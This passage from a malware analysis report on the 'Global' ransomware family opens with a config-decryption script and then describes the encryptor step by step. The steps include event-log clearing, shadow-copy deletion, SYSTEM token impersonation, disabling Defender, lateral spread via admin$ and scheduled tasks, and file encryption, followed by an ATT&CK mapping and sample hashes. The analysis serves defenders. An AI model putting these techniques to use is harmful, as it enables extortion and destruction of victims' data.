        raw = self.extract_config_section()
        print(f"Found .config section: {len(raw)} bytes")
        decrypted = self.decrypt_data(raw)

        output_file = Path("output.bin")
        with output_file.open('wb') as f:
            f.write(decrypted)
        print(f"Decrypted configuration saved to: {output_file}")


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <pe_file>")
        sys.exit(1)

    pe_file = Path(sys.argv[1])
    try:
        ConfigDecryptor(pe_file).process()
    except Exception as e:
        print(f"Error: {e}")
        sys.exit(1)

if __name__ == "__main__":
    main()

Crypto Context Setup

To successfully encrypt files, cryptographic context is acquired and a handle to a cryptographic service provider is returned. The CRYPT_VERIFYCONTEXT flag is used during context setup, which is typically only used by apps that leverage ephemeral keys, including apps that handle hashing, or encryption.

Figure 10: Crypto Context Setup  

Custom File Icon Setup

The embedded icon that will be applied as the file icon for encrypted files is base64 decoded, and dropped into the temp directory for all accessible users.

Figure 11: File Icon Setup  

Figure 12: Base64 Icon Data  

Figure 13: File Icon Decode  

Figure 14: File Icon Written  

Figure 15: File Icon Preview  

Once the file icon is extracted and successfully dropped to disk, it is set as the associated file icon for encrypted files with the appended custom file extension.

Figure 16: Setting File Icon Association  

Print Ransom Note

Next, the encryptor will start the process of printing the ransom note to all networked printers accessible by the host, by creating a PDF version of the ransom note, which is never utilized during the print jobs (funny).

Figure 17: Setup and Run Ransom Note Print Job  

The PDF copy of the ransom note is named PrintMe22.pdf and is dropped in the current user’s temp directory (still unused).

Figure 18: Location of PDF Ransom Note  

Figure 19: Creation of PDF Ransom Note  

Networked printers are now enumerated.

Figure 20: Networked Printer Discovery  

For each printer identified, a handle is opened, a temporary file containing the content of the ransom note is dropped in the current user temp directory, and a print job is created, sending the content of the ransom note temp file to each printer.

Figure 21: Sending Note Print Job  

Clear Windows Event Log

Immediately after sending the print jobs, the encryptor will attempt to clear the history of several Windows event log sources. These being Application, Security, System, Setup, and ForwardedEvents

Figure 22: Clearing Event Logs  

Delete Shadow Copies

After wiping Windows event logs, vssadmin is executed by the encryptor in a crude attempt to delete all shadow copies, to hinder recovery efforts.

Figure 23: Deleting Shadow Copies  

Token Elevation

The encryptor will then attempt to adjust the token privileges of its process.

Figure 24: Adjust Process Token  

Figure 25: Set Token Privileges  

Impersonate SYSTEM

With elevated token privileges set, the encryptor will attempt to elevate to NT AUTHORITY\SYSTEM permissions by impersonating the token of the winlogon.exe process or the TrustedInstaller service/process if the first attempt to impersonate winlogon fails.

Figure 26: Token Impersonation  

Figure 27: Impersonate Winlogon  

Figure 28: Impersonate TrustedInstaller  

Impair Defenses

Now running as SYSTEM, the encryptor will attempt to stop and delete services related to Microsoft Defender, event logging, network inspection, and system integrity.

Figure 29: Impairing Security Services  

With security services stopped and deleted, any processes associated with those services or category of services are also terminated. The process token is then reverted to the original token.

Figure 30: Terminating Security Processes  

Enumerate Domain Devices

If a domain username and password are provided, the encryptor will attempt to access neighboring devices using LDAP, and execute a copy of itself as a service, or using a scheduled task.

First, the list of devices in the domain is collected.

Figure 31-34: Query Domain Computers  

A DNS query is performed on each device identified, and each IP successfully resolved is sent an ICMP echo request to identify hosts that are alive.

Figure 35: Resolve Domain Host IP  

Figure 36: Ping Host  

Remote Execution

The encryptor binary is uploaded to the target host’s Temp folder through the admin$ share, and a service is created to execute it.

Figure 37-41: Upload and Execute as Service  

If service creation fails, a scheduled task is created to execute the uploaded encryptor binary.

Figure 42: Execute as Scheduled Task  

Local Encryption Setup

Drives to be targeted for encryption are now identified.

Figure 43: Identify Target Drives  

Two thread pools are created, one for local drive encryption, and one for remote drive encryption.

Figure 44: Thread Pool Creation  

Local Encryption Start

Encryption for local drives is started.

Figure 45-46: Local Encryption Job Start

First, a list of every drive letter on the target host is collected (again), and for each drive, the type is determined to prevent targeting of CD-ROM drives. Remaining applicable drives are checked once more to determine if they are accessible based on file attributes, and drives that fail this check are skipped.

The files and folders on each valid drive are iterated through, queueing target files for encryption, while skipping critical system files and directories, and dropping the ransom note in writable directories.  

Each valid target file is renamed to include the ransomware custom extension, and based on its size it is either fully encrypted or partially encrypted using a Curve25519 derived one-time stream-cipher key; the encrypted data overwrites the original data in-place and a trailer containing the ephemeral public key and integrity metadata is appended to the end of the file.

Figure 47-48: Queue Target Files and Drop Note

Figure 49: Local Encryption Job  

Remote Encryption Start

With local drives finished, encryption for remote hosts is started. Remote encryption is done either by directly accessing the target share, or mounting the share as a local drive.

Alive neighboring devices are identified by sending ICMP echo requests to each IP on network the target device has access to. For devices that are alive, an connection attempt is made, and shares are enumerated. Accessible shares that do not match a list of exclusions are queued for encryption.

Files on shares are encrypted in batches, and once the last batch finishes, share connections are killed, and any shares mounted as local drives are unmounted.

Figure 50: Get Device Network and Domain Info  

Figure 51: Check if Target Alive  

Figure 52: Add Connection  

Figure 53: Enumerate Shares  

Set Desktop Wallpaper

The target host wallpaper is set, notifying the user of their demise, and the name of the ransom note.

Figure 54: Resolve More APIs  

Figure 55: Set Wallpaper  

Self Deletion

To cleanup, the encryptor will launch command prompt, have it ping 127.0.0.7, giving the encryptor process just enough time to finish and close the handle to its mutex before the encryptor binary is deleted.

Figure 56: Ping and Self Delete  

MITRE ATT&CK Mapping

• Collection (TA0009)
  • T1005: Data from Local System
• Defense Evasion (TA0005)
  • T1070: Indicator Removal
    • T1070.001: Clear Windows Event Logs
    • T1070.004: File Deletion
  • T1107: File Deletion
  • T1134: Access Token Manipulation
  • T1202: Indirect Command Execution
  • T1562: Impair Defenses
    • T1562.001: Disable or Modify Tools
• Discovery (TA0007)
  • T1007: System Service Discovery
  • T1016: System Network Configuration Discovery
  • T1057: Process Discovery
  • T1063: Security Software Discovery
  • T1082: System Information Discovery
  • T1083: File and Directory Discovery
  • T1135: Network Share Discovery
  • T1518: Software Discovery
    • T1518.001: Security Software Discovery
• Execution (TA0002)
  • T1053: Scheduled Task/Job
    • T1053.005: Scheduled Task
  • T1059: Command and Scripting Interpreter
  • T1106: Native API
  • T1129: Shared Modules
• Impact (TA0040)
  • T1486: Data Encrypted for Impact
  • T1489: Service Stop
  • T1490: Inhibit System Recovery
• Persistence (TA0003)
  • T1031: Modify Existing Service
  • T1053: Scheduled Task/Job
    • T1053.005: Scheduled Task
  • T1543: Create or Modify System Process
    • T1543.003: Windows Service
• Privilege Escalation (TA0004)
  • T1053: Scheduled Task/Job
    • T1053.005: Scheduled Task
  • T1134: Access Token Manipulation
  • T1543: Create or Modify System Process
    • T1543.003: Windows Service

Related Samples

These are additional samples related to the Global Ransomware family:

SHA-256: 1f6640102f6472523830d69630def669dc3433bbb1c0e6183458bd792d420f8e
SHA-256: 232f86e26ced211630957baffcd36dd3bcd6a786f3d307127e1ea9a8b31c199f
SHA-256: 28f3de066878cb710fe5d44f7e11f65f25328beff953e00587ffeb5ac4b2faa8
SHA-256: a8c28bd6f0f1fe6a9b880400853fc86e46d87b69565ef15d8ab757979cd2cc73
SHA-256: c5f49c0f566a114b529138f8bd222865c9fa9fa95f96ec1ded50700764a1d4e7
SHA-256: c7b91de4b4b10c22f2e3bca1e2603160588fd8fd829fd46103cf536b6082e310

Acknowledgment

Feedback and corrections are welcome.

Thanks to REMOVED for sharing the Global promo video with me!
Thanks to OALabs for HashDB!